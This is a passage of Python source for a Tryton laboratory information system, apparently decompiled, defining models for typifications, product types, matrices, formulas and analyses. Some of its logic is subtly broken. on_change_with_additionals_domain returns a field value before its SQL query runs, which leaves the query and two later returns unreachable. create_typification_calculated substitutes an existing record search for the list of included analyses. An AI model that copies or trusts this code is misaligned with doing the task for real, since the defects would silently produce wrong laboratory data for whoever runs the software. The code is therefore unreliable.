'Result'),\n ('both', 'Both')],\n 'Result type',\n sort=False)\n valid = fields.Boolean('Active', depends=['valid_readonly'], states={'readonly': Bool(Eval('valid_readonly'))})\n valid_view = fields.Function((fields.Boolean('Active')), 'get_views_field',\n searcher='search_views_field')\n valid_readonly = fields.Function(fields.Boolean('Field active readonly'), 'on_change_with_valid_readonly')\n\n @classmethod\n def __setup__(cls):\n super(Typification, cls).__setup__()\n cls._order.insert(0, ('product_type', 'ASC'))\n cls._order.insert(1, ('matrix', 'ASC'))\n cls._order.insert(2, ('analysis', 'ASC'))\n cls._order.insert(3, ('method', 'ASC'))\n t = cls.__table__()\n cls._sql_constraints += [\n (\n 'product_matrix_analysis_method_uniq',\n Unique(t, t.product_type, t.matrix, t.analysis, t.method),\n 'This typification already exists')]\n cls._error_messages.update({'limits':'Quantification limit must be greater than Detection limit', \n 'default_typification':'There is already a default typification for this combination of product type, matrix and analysis', \n 'not_default_typification':'This typification should be the default'})\n\n @staticmethod\n def default_limit_digits():\n return 2\n\n @staticmethod\n def default_default_repetitions():\n return 0\n\n @staticmethod\n def default_by_default():\n return True\n\n @staticmethod\n def default_calc_decimals():\n return 2\n\n @staticmethod\n def default_report():\n return True\n\n @staticmethod\n def default_report_type():\n return 'normal'\n\n @staticmethod\n def default_report_result_type():\n return 'result'\n\n @staticmethod\n def default_valid():\n return True\n\n @staticmethod\n def default_check_result_limits():\n return False\n\n @staticmethod\n def default_detection_limit():\n return 0.0\n\n @staticmethod\n def default_quantification_limit():\n return 0.0\n\n @classmethod\n def get_views_field(cls, typifications, names):\n result = {}\n for name in names:\n field_name = name[:-5]\n result[name] = {}\n if field_name == 'valid':\n for t in typifications:\n result[name][t.id] = getattr(t, field_name, None)\n\n else:\n for t in typifications:\n field = getattr(t, field_name, None)\n result[name][t.id] = field.id if field else None\n\n return result\n\n @classmethod\n def search_views_field(cls, name, clause):\n return [(name[:-5],) + tuple(clause[1:])]\n\n @fields.depends('analysis')\n def on_change_with_valid_readonly(self, name=None):\n if self.analysis:\n if self.analysis.state == 'disabled':\n return True\n return False\n\n @fields.depends('analysis')\n def on_change_analysis(self):\n method = None\n if self.analysis:\n methods = self.on_change_with_method_domain()\n if len(methods) == 1:\n method = methods[0]\n self.method = method\n\n @fields.depends('analysis')\n def on_change_with_method_domain(self, name=None):\n methods = []\n if self.analysis:\n if self.analysis.methods:\n methods = [m.id for m in self.analysis.methods]\n return methods\n\n def get_technical_scope_versions(self, name=None):\n pool = Pool()\n TechnicalScopeVersionLine = pool.get('lims.technical.scope.version.line')\n version_lines = TechnicalScopeVersionLine.search([\n (\n 'typification', '=', self.id),\n ('version.valid', '=', True)])\n if version_lines:\n return [line.version.id for line in version_lines]\n return []\n\n @fields.depends('analysis', 'product_type', 'matrix')\n def on_change_with_additionals_domain(self, name=None):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n Typification = pool.get('lims.typification')\n if not self.analysis:\n return []\n else:\n return self.product_type and self.matrix or []\n cursor.execute('SELECT a.id FROM \"' + Analysis._table + '\" a INNER JOIN \"' + Typification._table + '\" t ON a.id = t.analysis WHERE a.id != %s AND a.type = \\'analysis\\' AND a.behavior != \\'additional\\' AND a.state = \\'active\\' AND t.product_type = %s AND t.matrix = %s AND t.valid IS TRUE', (\n self.analysis.id, self.product_type.id, self.matrix.id))\n res = cursor.fetchall()\n return res or []\n return [x[0] for x in res]\n\n def get_rec_name(self, name):\n return self.product_type.rec_name + '-' + self.matrix.rec_name\n\n @classmethod\n def search_rec_name(cls, name, clause):\n typifications = cls.search(['OR',\n ('product_type', ) + tuple(clause[1:]),\n ('matrix', ) + tuple(clause[1:]),\n ('analysis', ) + tuple(clause[1:]),\n ('method', ) + tuple(clause[1:])],\n order=[])\n if typifications:\n return [\n (\n 'id', 'in', [t.id for t in typifications])]\n return [\n (\n cls._rec_name,) + tuple(clause[1:])]\n\n @classmethod\n def validate(cls, typifications):\n super(Typification, cls).validate(typifications)\n for t in typifications:\n t.check_limits()\n t.check_default()\n\n def check_limits(self):\n if self.detection_limit:\n if self.quantification_limit <= self.detection_limit:\n self.raise_user_error('limits')\n\n def check_default(self):\n if self.by_default:\n typifications = self.search([\n (\n 'product_type', '=', self.product_type.id),\n (\n 'matrix', '=', self.matrix.id),\n (\n 'analysis', '=', self.analysis.id),\n ('valid', '=', True),\n ('by_default', '=', True),\n (\n 'id', '!=', self.id)])\n if typifications:\n self.raise_user_error('default_typification')\n elif self.valid:\n typifications = self.search([\n (\n 'product_type', '=', self.product_type.id),\n (\n 'matrix', '=', self.matrix.id),\n (\n 'analysis', '=', self.analysis.id),\n ('valid', '=', True),\n (\n 'id', '!=', self.id)])\n if not typifications:\n self.raise_user_error('not_default_typification')\n\n @classmethod\n def create(cls, vlist):\n typifications = super(Typification, cls).create(vlist)\n active_typifications = [t for t in typifications if t.valid]\n cls.create_typification_calculated(active_typifications)\n return typifications\n\n @classmethod\n def create_typification_calculated(cls, typifications):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n CalculatedTypification = pool.get('lims.typification.calculated')\n for typification in typifications:\n cursor.execute('SELECT DISTINCT(analysis) FROM \"' + cls._table + '\" WHERE product_type = %s AND matrix = %s AND valid', (\n typification.product_type.id, typification.matrix.id))\n typified_analysis = [a[0] for a in cursor.fetchall()]\n typified_analysis_ids = ', '.join((str(a) for a in typified_analysis))\n sets_groups_ids = Analysis.get_parents_analysis(typification.analysis.id)\n for set_group_id in sets_groups_ids:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', typification.product_type.id),\n (\n 'matrix', '=', typification.matrix.id),\n (\n 'analysis', '=', set_group_id)])\n ia = t_set_group or Analysis.get_included_analysis_analysis(set_group_id)\n if not ia:\n continue\n else:\n included_ids = ', '.join((str(a) for a in ia))\n cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE id IN (' + included_ids + ') AND id NOT IN (' + typified_analysis_ids + ')')\n if cursor.fetchone():\n typified = False\n else:\n typified = True\n if typified:\n typification_create = [\n {'product_type':typification.product_type.id, 'matrix':typification.matrix.id, \n 'analysis':set_group_id}]\n CalculatedTypification.create(typification_create)\n\n return typifications\n\n @classmethod\n def delete(cls, typifications):\n cls.delete_typification_calculated(typifications)\n super(Typification, cls).delete(typifications)\n\n @classmethod\n def delete_typification_calculated(cls, typifications):\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n CalculatedTypification = pool.get('lims.typification.calculated')\n for typification in typifications:\n others = cls.search([\n (\n 'product_type', '=', typification.product_type.id),\n (\n 'matrix', '=', typification.matrix.id),\n (\n 'analysis', '=', typification.analysis.id),\n ('valid', '=', True),\n (\n 'id', '!=', typification.id)])\n if others:\n continue\n sets_groups_ids = Analysis.get_parents_analysis(typification.analysis.id)\n for set_group_id in sets_groups_ids:\n typified_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', typification.product_type.id),\n (\n 'matrix', '=', typification.matrix.id),\n (\n 'analysis', '=', set_group_id)])\n if typified_set_group:\n CalculatedTypification.delete(typified_set_group)\n\n @classmethod\n def write(cls, *args):\n (super(Typification, cls).write)(*args)\n actions = iter(args)\n for typifications, vals in zip(actions, actions):\n if 'valid' in vals:\n if vals['valid']:\n cls.create_typification_calculated(typifications)\n else:\n cls.delete_typification_calculated(typifications)\n fields_check = ('detection_limit', 'quantification_limit', 'initial_concentration',\n 'final_concentration', 'start_uom', 'end_uom', 'calc_decimals',\n 'report')\n for field in fields_check:\n if field in vals:\n cls.update_laboratory_notebook(typifications)\n break\n\n @classmethod\n def update_laboratory_notebook(cls, typifications):\n NotebookLine = Pool().get('lims.notebook.line')\n for typification in typifications:\n if not typification.valid:\n continue\n notebook_lines = NotebookLine.search([\n ('notebook.fraction.special_type', '!=', 'rm'),\n (\n 'notebook.product_type', '=', typification.product_type.id),\n (\n 'notebook.matrix', '=', typification.matrix.id),\n (\n 'analysis', '=', typification.analysis.id),\n (\n 'method', '=', typification.method.id),\n ('end_date', '=', None)])\n if notebook_lines:\n NotebookLine.write(notebook_lines, {'detection_limit':str(typification.detection_limit), \n 'quantification_limit':str(typification.quantification_limit), \n 'initial_concentration':str(typification.initial_concentration or ''), \n 'final_concentration':str(typification.final_concentration or ''), \n 'initial_unit':typification.start_uom, \n 'final_unit':typification.end_uom, \n 'decimals':typification.calc_decimals, \n 'report':typification.report})\n notebook_lines = NotebookLine.search([\n ('notebook.fraction.special_type', '=', 'rm'),\n (\n 'notebook.product_type', '=', typification.product_type.id),\n (\n 'notebook.matrix', '=', typification.matrix.id),\n (\n 'analysis', '=', typification.analysis.id),\n (\n 'method', '=', typification.method.id),\n ('end_date', '=', None)])\n if notebook_lines:\n NotebookLine.write(notebook_lines, {'initial_concentration': str(typification.initial_concentration or '')})\n\n\nclass TypificationAditional(ModelSQL):\n __doc__ = 'Typification - Additional analysis'\n __name__ = 'lims.typification-analysis'\n typification = fields.Many2One('lims.typification', 'Typification', ondelete='CASCADE',\n select=True,\n required=True)\n analysis = fields.Many2One('lims.analysis', 'Analysis', ondelete='CASCADE',\n select=True,\n required=True)\n\n\nclass TypificationReadOnly(ModelSQL, ModelView):\n __doc__ = 'Typification'\n __name__ = 'lims.typification.readonly'\n product_type = fields.Many2One('lims.product.type', 'Product type', readonly=True)\n matrix = fields.Many2One('lims.matrix', 'Matrix', readonly=True)\n analysis = fields.Many2One('lims.analysis', 'Analysis', readonly=True)\n method = fields.Many2One('lims.lab.method', 'Method', readonly=True)\n\n @classmethod\n def __setup__(cls):\n super(TypificationReadOnly, cls).__setup__()\n cls._order.insert(0, ('product_type', 'ASC'))\n cls._order.insert(1, ('matrix', 'ASC'))\n cls._order.insert(2, ('analysis', 'ASC'))\n cls._order.insert(3, ('method', 'ASC'))\n\n @staticmethod\n def table_query():\n pool = Pool()\n typification = pool.get('lims.typification').__table__()\n columns = [\n typification.id,\n typification.create_uid,\n typification.create_date,\n typification.write_uid,\n typification.write_date,\n typification.product_type,\n typification.matrix,\n typification.analysis,\n typification.method]\n where = Literal(True)\n return (typification.select)(*columns, **{'where': where})\n\n\nclass CalculatedTypification(ModelSQL):\n __doc__ = 'Calculated Typification'\n __name__ = 'lims.typification.calculated'\n product_type = fields.Many2One('lims.product.type', 'Product type', required=True,\n select=True)\n matrix = fields.Many2One('lims.matrix', 'Matrix', required=True, select=True)\n analysis = fields.Many2One('lims.analysis', 'Analysis', required=True, ondelete='CASCADE',\n select=True)\n\n @classmethod\n def __register__(cls, module_name):\n super(CalculatedTypification, cls).__register__(module_name)\n if cls.search_count([]) == 0:\n cls.populate_typification_calculated()\n\n @classmethod\n def populate_typification_calculated(cls):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n Typification = pool.get('lims.typification')\n cursor.execute('SELECT DISTINCT(product_type, matrix) FROM \"' + Typification._table + '\" WHERE valid')\n typifications = cursor.fetchall()\n if typifications:\n typifications_count = 0\n typifications_total = len(typifications)\n for typification in typifications:\n typifications_count += 1\n logging.getLogger('lims').info('Calculating typification %s of %s' % (\n typifications_count, typifications_total))\n product_type = int(typification[0].split(',')[0][1:])\n matrix = int(typification[0].split(',')[1][:-1])\n cursor.execute('SELECT DISTINCT(analysis) FROM \"' + Typification._table + '\" WHERE product_type = %s AND matrix = %s AND valid', (\n product_type, matrix))\n typified_analysis = [a[0] for a in cursor.fetchall()]\n typified_analysis_ids = ', '.join((str(a) for a in typified_analysis))\n cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE type IN (\\'set\\', \\'group\\') AND state = \\'active\\'')\n sets_groups_ids = [x[0] for x in cursor.fetchall()]\n if sets_groups_ids:\n for set_group_id in sets_groups_ids:\n typified = True\n ia = Analysis.get_included_analysis_analysis(set_group_id)\n if not ia:\n continue\n included_ids = ', '.join((str(a) for a in ia))\n cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE id IN (' + included_ids + ') AND id NOT IN (' + typified_analysis_ids + ')')\n if cursor.fetchone():\n typified = False\n if typified:\n typification_create = [\n {'product_type':product_type, 'matrix':matrix, \n 'analysis':set_group_id}]\n cls.create(typification_create)\n\n\nclass CalculatedTypificationReadOnly(ModelSQL, ModelView):\n __doc__ = 'Calculated Typification'\n __name__ = 'lims.typification.calculated.readonly'\n product_type = fields.Many2One('lims.product.type', 'Product type', readonly=True)\n matrix = fields.Many2One('lims.matrix', 'Matrix', readonly=True)\n analysis = fields.Many2One('lims.analysis', 'Analysis', readonly=True)\n\n @classmethod\n def __setup__(cls):\n super(CalculatedTypificationReadOnly, cls).__setup__()\n cls._order.insert(0, ('product_type', 'ASC'))\n cls._order.insert(1, ('matrix', 'ASC'))\n cls._order.insert(2, ('analysis', 'ASC'))\n\n @staticmethod\n def table_query():\n pool = Pool()\n typification = pool.get('lims.typification.calculated').__table__()\n columns = [\n typification.id,\n typification.create_uid,\n typification.create_date,\n typification.write_uid,\n typification.write_date,\n typification.product_type,\n typification.matrix,\n typification.analysis]\n where = Literal(True)\n return (typification.select)(*columns, **{'where': where})\n\n\nclass ProductType(ModelSQL, ModelView):\n __doc__ = 'Product Type'\n __name__ = 'lims.product.type'\n _rec_name = 'description'\n code = fields.Char('Code', required=True)\n description = fields.Char('Description', required=True)\n restricted_entry = fields.Boolean('Restricted entry')\n\n @classmethod\n def __setup__(cls):\n super(ProductType, cls).__setup__()\n t = cls.__table__()\n cls._sql_constraints += [\n (\n 'code_uniq', Unique(t, t.code),\n 'Product type code must be unique')]\n\n @staticmethod\n def default_restricted_entry():\n return False\n\n def get_rec_name(self, name):\n if self.code:\n return self.code + ' - ' + self.description\n return self.description\n\n @classmethod\n def search_rec_name(cls, name, clause):\n field = None\n for field in ('code', 'description'):\n records = cls.search([(field,) + tuple(clause[1:])], limit=1)\n if records:\n break\n\n if records:\n return [\n (\n field,) + tuple(clause[1:])]\n return [\n (\n cls._rec_name,) + tuple(clause[1:])]\n\n\nclass Matrix(ModelSQL, ModelView):\n \"\"\"Matrix\"\"\"\n __name__ = 'lims.matrix'\n _rec_name = 'description'\n code = fields.Char('Code', required=True)\n description = fields.Char('Description', required=True)\n restricted_entry = fields.Boolean('Restricted entry')\n\n @classmethod\n def __setup__(cls):\n super(Matrix, cls).__setup__()\n t = cls.__table__()\n cls._sql_constraints += [\n (\n 'code_uniq', Unique(t, t.code),\n 'Matrix code must be unique')]\n\n @staticmethod\n def default_restricted_entry():\n return False\n\n def get_rec_name(self, name):\n if self.code:\n return self.code + ' - ' + self.description\n return self.description\n\n @classmethod\n def search_rec_name(cls, name, clause):\n field = None\n for field in ('code', 'description'):\n records = cls.search([(field,) + tuple(clause[1:])], limit=1)\n if records:\n break\n\n if records:\n return [\n (\n field,) + tuple(clause[1:])]\n return [\n (\n cls._rec_name,) + tuple(clause[1:])]\n\n\nclass Formula(ModelSQL, ModelView):\n \"\"\"Formula\"\"\"\n __name__ = 'lims.formula'\n name = fields.Char('Name', required=True)\n formula = fields.Char('Formula', required=True)\n variables = fields.One2Many('lims.formula.variable', 'formula', 'Variables',\n required=True)\n\n\nclass FormulaVariable(ModelSQL, ModelView):\n __doc__ = 'Formula Variable'\n __name__ = 'lims.formula.variable'\n formula = fields.Many2One('lims.formula', 'Formula', required=True, ondelete='CASCADE',\n select=True)\n number = fields.Char('Number', required=True)\n description = fields.Char('Description', required=True)\n fraction_type = fields.Many2One('lims.fraction.type', 'Fraction type')\n constant = fields.Char('Constant')\n\n\nclass Analysis(Workflow, ModelSQL, ModelView):\n __doc__ = 'Analysis/Set/Group'\n __name__ = 'lims.analysis'\n _rec_name = 'description'\n code = fields.Char('Code', required=True, states={'readonly': Eval('state') != 'draft'},\n depends=['state'])\n description = fields.Char('Description', required=True, translate=True, states={'readonly': Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'state'])\n type = fields.Selection([\n ('analysis', 'Analysis'),\n ('set', 'Set'),\n ('group', 'Group')],\n 'Type',\n sort=False, required=True, states={'readonly': Eval('state') != 'draft'},\n depends=['state'])\n laboratories = fields.One2Many('lims.analysis-laboratory', 'analysis', 'Laboratories',\n context={'type': Eval('type')}, states={'invisible':Or(Eval('type').in_(['group']), Bool(Equal(Eval('behavior'), 'additional'))), \n 'required':Not(Or(Eval('type').in_(['set', 'group']), Bool(Equal(Eval('behavior'), 'additional')))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n laboratory_domain = fields.Function(fields.Many2Many('lims.laboratory', None, None, 'Laboratories'), 'on_change_with_laboratory_domain')\n methods = fields.Many2Many('lims.analysis-lab.method', 'analysis', 'method',\n 'Methods', states={'invisible':Or(Eval('type').in_(['set', 'group']), Bool(Equal(Eval('behavior'), 'additional'))), \n 'required':Not(Or(Eval('type').in_(['set', 'group']), Bool(Equal(Eval('behavior'), 'additional')))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n devices = fields.One2Many('lims.analysis.device', 'analysis', 'Devices', context={'laboratory_domain': Eval('laboratory_domain')},\n states={'invisible':Or(Eval('type').in_(['set', 'group']), Bool(Equal(Eval('behavior'), 'additional'))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'laboratory_domain', 'state'])\n start_date = fields.Date('Entry date', readonly=True)\n end_date = fields.Date('Leaving date', readonly=True)\n included_analysis = fields.One2Many('lims.analysis.included', 'analysis', 'Included analysis',\n context={'analysis':Eval('id'), \n 'type':Eval('type'), 'laboratory_domain':Eval('laboratory_domain')},\n states={'invisible':Bool(Equal(Eval('type'), 'analysis')), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'laboratory_domain', 'state'])\n all_included_analysis = fields.Function(fields.One2Many('lims.analysis', None, 'All included analysis'), 'on_change_with_all_included_analysis')\n behavior = fields.Selection([\n ('normal', 'Normal'),\n ('internal_relation', 'Internal Relation'),\n ('additional', 'Additional')],\n 'Behavior',\n required=True, sort=False, states={'readonly': Or(Eval('type').in_(['set', 'group']), Eval('state') != 'draft')},\n depends=[\n 'type', 'state'])\n result_formula = fields.Char('Result formula', states={'invisible':Not(Bool(Equal(Eval('behavior'), 'internal_relation'))), \n 'required':Bool(Equal(Eval('behavior'), 'internal_relation')), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'behavior', 'state'])\n converted_result_formula = fields.Char('Converted result formula', states={'invisible':Not(Bool(Equal(Eval('behavior'), 'internal_relation'))), \n 'required':Bool(Equal(Eval('behavior'), 'internal_relation')), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'behavior', 'state'])\n gender_species = fields.Text('Gender Species', translate=True, states={'invisible':Not(And(Bool(Equal(Eval('type'), 'analysis')), Bool(Equal(Eval('behavior'), 'normal')))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n microbiology = fields.Function(fields.Boolean('Microbiology'), 'on_change_with_microbiology')\n formula = fields.Many2One('lims.formula', 'Formula', states={'invisible':Not(And(Bool(Equal(Eval('type'), 'analysis')), Bool(Equal(Eval('behavior'), 'normal')))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n product = fields.Many2One('product.product', 'Product')\n automatic_acquisition = fields.Boolean('Automatic acquisition', states={'readonly': Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'state'])\n order = fields.Integer('Order', states={'invisible':Not(And(Bool(Equal(Eval('type'), 'analysis')), Eval('behavior').in_(['normal', 'internal_relation']))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n disable_as_individual = fields.Boolean('Not allowed as individual service',\n states={'invisible':Not(And(Bool(Equal(Eval('type'), 'analysis')), Eval('behavior').in_(['normal', 'internal_relation']))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n state = fields.Selection([\n ('draft', 'Draft'),\n ('active', 'Active'),\n ('disabled', 'Disabled')],\n 'State',\n required=True, readonly=True)\n planning_legend = fields.Char('Planning legend', states={'invisible':Not(And(Bool(Equal(Eval('type'), 'analysis')), Bool(Equal(Eval('behavior'), 'normal')))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n comments = fields.Text('Warnings/Comments')\n pending_fractions = fields.Function((fields.Integer('Pending fractions')), 'get_pending_fractions',\n searcher='search_pending_fractions')\n\n @classmethod\n def __setup__(cls):\n super(Analysis, cls).__setup__()\n t = cls.__table__()\n cls._sql_constraints += [\n (\n 'code_uniq', Unique(t, t.code),\n 'Analysis code must be unique')]\n cls._error_messages.update({'description_uniq':'Analysis description must be unique', \n 'not_laboratory':'Must define a Laboratory', \n 'set_laboratories':'A Set can be assigned to a single laboratory', \n 'analysis_laboratory':'The \"%(analysis)s\" analysis is not defined in laboratory \"%(laboratory)s\"', \n 'not_laboratory_change':'You can not change the laboratory because the analysis is included in a set/group with this laboratory', \n 'end_date':'The leaving date cannot be lower than entry date', \n 'end_date_wrong':'End date should not be greater than the current date'})\n cls._transitions |= set((('draft', 'active'), ('active', 'disabled')))\n cls._buttons.update({'relate_analysis':{'invisible':Eval('type') != 'set', \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))}, \n 'activate':{'invisible': Eval('state') != 'draft'}, \n 'disable':{'invisible': Eval('state') != 'active'}})\n\n @staticmethod\n def default_behavior():\n return 'normal'\n\n @staticmethod\n def default_automatic_acquisition():\n return False\n\n @staticmethod\n def default_disable_as_individual():\n return False\n\n @staticmethod\n def default_state():\n return 'draft'\n\n @fields.depends('type', 'behavior')\n def on_change_with_behavior(self, name=None):\n if self.type in ('set', 'group'):\n return 'normal'\n return self.behavior\n\n @fields.depends('laboratories')\n def on_change_with_laboratory_domain(self, name=None):\n if self.laboratories:\n return [l.laboratory.id for l in self.laboratories if l.laboratory]\n return []\n\n @fields.depends('included_analysis')\n def on_change_with_all_included_analysis(self, name=None):\n Analysis = Pool().get('lims.analysis')\n return Analysis.get_included_analysis(self.id)\n\n @classmethod\n def view_attributes(cls):\n return [\n (\n '//page[@id=\"microbiology\"]', 'states',\n {'invisible': Not(Bool(Eval('microbiology')))}),\n (\n '//group[@id=\"button_holder\"]', 'states',\n {'invisible': Eval('type') != 'set'}),\n (\n '//page[@id=\"included_analysis\"]', 'states',\n {'invisible': Bool(Equal(Eval('type'), 'analysis'))}),\n (\n '//page[@id=\"devices\"]|//page[@id=\"methods\"]',\n 'states',\n {'invisible': Or(Eval('type').in_(['set', 'group']), Bool(Equal(Eval('behavior'), 'additional')))}),\n (\n '//page[@id=\"laboratories\"]',\n 'states',\n {'invisible': Or(Eval('type').in_(['group']), Bool(Equal(Eval('behavior'), 'additional')))})]\n\n @classmethod\n def get_included_analysis(cls, analysis_id):\n cursor = Transaction().connection.cursor()\n AnalysisIncluded = Pool().get('lims.analysis.included')\n childs = []\n cursor.execute('SELECT included_analysis FROM \"' + AnalysisIncluded._table + '\" WHERE analysis = %s', (\n analysis_id,))\n included_analysis_ids = [x[0] for x in cursor.fetchall()]\n if included_analysis_ids:\n for analysis_id in included_analysis_ids:\n if analysis_id not in childs:\n childs.append(analysis_id)\n childs.extend(cls.get_included_analysis(analysis_id))\n\n return childs\n\n @classmethod\n def get_included_analysis_analysis(cls, analysis_id):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n AnalysisIncluded = pool.get('lims.analysis.included')\n Analysis = pool.get('lims.analysis')\n childs = []\n cursor.execute('SELECT ia.included_analysis, a.type FROM \"' + AnalysisIncluded._table + '\" ia INNER JOIN \"' + Analysis._table + '\" a ON a.id = ia.included_analysis WHERE analysis = %s', (\n analysis_id,))\n included_analysis = cursor.fetchall()\n if included_analysis:\n for analysis in included_analysis:\n if analysis[1] == 'analysis':\n if analysis[0] not in childs:\n childs.append(analysis[0])\n childs.extend(cls.get_included_analysis_analysis(analysis[0]))\n\n return childs\n\n @classmethod\n def get_parents_analysis(cls, analysis_id):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n AnalysisIncluded = pool.get('lims.analysis.included')\n Analysis = pool.get('lims.analysis')\n parents = []\n cursor.execute('SELECT ia.analysis FROM \"' + AnalysisIncluded._table + '\" ia INNER JOIN \"' + Analysis._table + '\" a ON a.id = ia.analysis WHERE ia.included_analysis = %s AND a.state = \\'active\\'', (\n analysis_id,))\n parents_analysis_ids = [x[0] for x in cursor.fetchall()]\n if parents_analysis_ids:\n for analysis_id in parents_analysis_ids:\n if analysis_id not in parents:\n parents.append(analysis_id)\n parents.extend(cls.get_parents_analysis(analysis_id))\n\n return parents\n\n def get_rec_name(self, name):\n if self.code:\n return self.code + ' - ' + self.description\n return self.description\n\n @classmethod\n def search_rec_name(cls, name, clause):\n field = None\n for field in ('code', 'description'):\n records = cls.search([(field,) + tuple(clause[1:])], limit=1)\n if records:\n break\n\n if records:\n return [\n (\n field,) + tuple(clause[1:])]\n return [\n (\n cls._rec_name,) + tuple(clause[1:])]\n\n @classmethod\n def validate(cls, analysis):\n super(Analysis, cls).validate(analysis)\n for a in analysis:\n cls.check_duplicate_description(a.type, a.description)\n a.check_set()\n a.check_end_date()\n\n @classmethod\n def check_duplicate_description(cls, type, description, count=1):\n if cls.search_count([\n (\n 'description', '=', description),\n (\n 'type', '=', type),\n ('end_date', '=', None)]) > count:\n cls.raise_user_error('description_uniq')\n\n def check_set(self):\n if self.type == 'set':\n if self.laboratories:\n if len(self.laboratories) > 1:\n self.raise_user_error('set_laboratories')\n if self.included_analysis:\n if not self.laboratories:\n self.raise_user_error('not_laboratory')\n if self.included_analysis:\n set_laboratory = self.laboratories[0].laboratory\n for ia in self.included_analysis:\n included_analysis_laboratories = [lab.laboratory for lab in ia.included_analysis.laboratories]\n if set_laboratory not in included_analysis_laboratories:\n self.raise_user_error('analysis_laboratory', {'analysis':ia.included_analysis.rec_name, \n 'laboratory':set_laboratory.rec_name})\n\n def check_end_date(self):\n if self.end_date:\n if not self.start_date or self.end_date < self.start_date:\n self.raise_user_error('end_date')\n if not self.start_date or self.end_date > datetime.now().date():\n self.raise_user_error('end_date_wrong')\n\n @classmethod\n def write(cls, *args):\n actions = iter(args)\n for analysis, vals in zip(actions, actions):\n if vals.get('laboratories'):\n cls.check_laboratory_change(analysis, vals['laboratories'])\n if vals.get('description'):\n for a in analysis:\n cls.check_duplicate_description(vals.get('type', a.type), vals['description'], 0)\n\n (super(Analysis, cls).write)(*args)\n\n @classmethod\n def check_laboratory_change(cls, analysis, laboratories):\n AnalysisIncluded = Pool().get('lims.analysis.included')\n for a in analysis:\n if a.type == 'analysis':\n for operation in laboratories:\n if operation[0] == 'unlink':\n for laboratory in operation[1]:\n parent = AnalysisIncluded.search([\n (\n 'included_analysis', '=', a.id),\n (\n 'laboratory', '=', laboratory)])\n if parent:\n cls.raise_user_error('not_laboratory_change')\n\n @classmethod\n @ModelView.button_action('lims.wiz_lims_relate_analysis')\n def relate_analysis(cls, analysis):\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('active')\n def activate(cls, analysis):\n Date = Pool().get('ir.date')\n cls.write(analysis, {'start_date': Date.today()})\n cls.create_typification_calculated(analysis)\n cls.create_product(analysis)\n\n @classmethod\n @ModelView.button\n @Workflow.transition('disabled')\n def disable(cls, analysis):\n Date = Pool().get('ir.date')\n cls.write(analysis, {'end_date': Date.today()})\n cls.disable_typifications(analysis)\n cls.delete_included_analysis(analysis)\n cls.disable_product(analysis)\n\n @classmethod\n def create_typification_calculated(cls, analysis):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n Typification = pool.get('lims.typification')\n CalculatedTypification = pool.get('lims.typification.calculated')\n for included in analysis:\n if included.type == 'analysis':\n continue\n sets_groups_ids = [\n included.id]\n sets_groups_ids.extend(Analysis.get_parents_analysis(included.id))\n for set_group_id in sets_groups_ids:\n ia = Analysis.get_included_analysis_analysis(set_group_id)\n if not ia:\n continue\n included_ids = ', '.join((str(a) for a in ia))\n cursor.execute('SELECT DISTINCT(product_type, matrix) FROM \"' + Typification._table + '\" WHERE valid AND analysis IN (' + included_ids + ')')\n typifications = cursor.fetchall()\n if not typifications:\n continue\n for typification in typifications:\n product_type = int(typification[0].split(',')[0][1:])\n matrix = int(typification[0].split(',')[1][:-1])\n cursor.execute('SELECT DISTINCT(analysis) FROM \"' + Typification._table + '\" WHERE product_type = %s AND matrix = %s AND valid', (\n product_type, matrix))\n typified_analysis = [a[0] for a in cursor.fetchall()]\n typified_analysis_ids = ', '.join((str(a) for a in typified_analysis))\n cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE id IN (' + included_ids + ') AND id NOT IN (' + typified_analysis_ids + ')')\n if cursor.fetchone():\n typified = False\n else:\n typified = True\n if typified:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', product_type),\n (\n 'matrix', '=', matrix),\n (\n 'analysis', '=', set_group_id)])\n if not t_set_group:\n typification_create = [\n {'product_type':product_type, 'matrix':matrix, \n 'analysis':set_group_id}]\n CalculatedTypification.create(typification_create)\n else:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', product_type),\n (\n 'matrix', '=', matrix),\n (\n 'analysis', '=', set_group_id)])\n if t_set_group:\n CalculatedTypification.delete(t_set_group)\n\n return analysis\n\n @classmethod\n def create_product(cls, analysis):\n CreateProduct = Pool().get('lims.create_analysis_product', type='wizard')\n s_analysis, = analysis\n session_id, _, _ = CreateProduct.create()\n create_product = CreateProduct(session_id)\n with 